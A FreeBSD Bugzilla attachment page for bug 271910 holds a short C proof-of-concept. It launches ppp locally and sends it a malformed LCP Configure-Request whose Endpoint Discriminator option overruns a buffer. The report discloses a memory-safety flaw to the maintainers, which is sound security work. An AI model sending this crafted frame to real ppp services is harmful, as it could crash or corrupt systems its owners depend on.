FreeBSD Bugzilla – Attachment 242687 Details for
Bug 271910
bad TY_ENDDISC option can cause ppp to write beyond end of buffer
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Help
|
New Account
|
Log In
Remember
[x]
|
Forgot Password
Login:
[x]
send ppp an HDLC frame that causes it to overrun a buffer
ppp3c.c (text/plain), 1.07 KB, created by
Robert Morris
on 2023-06-08 15:41:47 UTC
(
hide
)
Description:
send ppp an HDLC frame that causes it to overrun a buffer
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-06-08 15:41:47 UTC
Size:
1.07 KB
patch
obsolete
>#include <fcntl.h> >#include <errno.h> >#include <sys/socket.h> >#include <netinet/in.h> >#include <sys/resource.h> >#include <sys/wait.h> >#include <arpa/inet.h> >#include <stdio.h> >#include <stdlib.h> >#include <unistd.h> >#include <string.h> >#include <signal.h> > >int >main() >{ > signal(SIGPIPE, SIG_IGN); > > int fds[2]; > if(socketpair(AF_UNIX, SOCK_STREAM, 0, fds) < 0){ > perror("socketpair"); > exit(1); > } > > int pid = fork(); > if(pid == 0){ > close(fds[0]); > close(0); > dup2(fds[1], 0); > close(fds[1]); > execl("/usr/sbin/ppp", "ppp", "-nat", "-direct", (void*)0); > perror("execl"); > exit(1); > } > close(fds[1]); > > unsigned char buf[] = { > 0x7e, > 0xc0, 0x21, // LCP > 0x01, 0x01, // code=Configure-Request, ID=1 > 0x00, 0x06, // length > 0x13, 0x02, // 0x13=Multilink-Endpoint-Discriminator, 2=length > 0x6b, 0x94, // HDLC checksum > 0x7e > }; > > for(int i = 0; i < sizeof(buf); i++){ > printf("%02x ", buf[i] & 0xff); > } > printf("\n"); > > int wr = write(fds[0], buf, sizeof(buf)); > if(wr < 0) perror("write"); > > usleep(500000); > close(fds[0]); >}
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=242687">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 271910
: 242687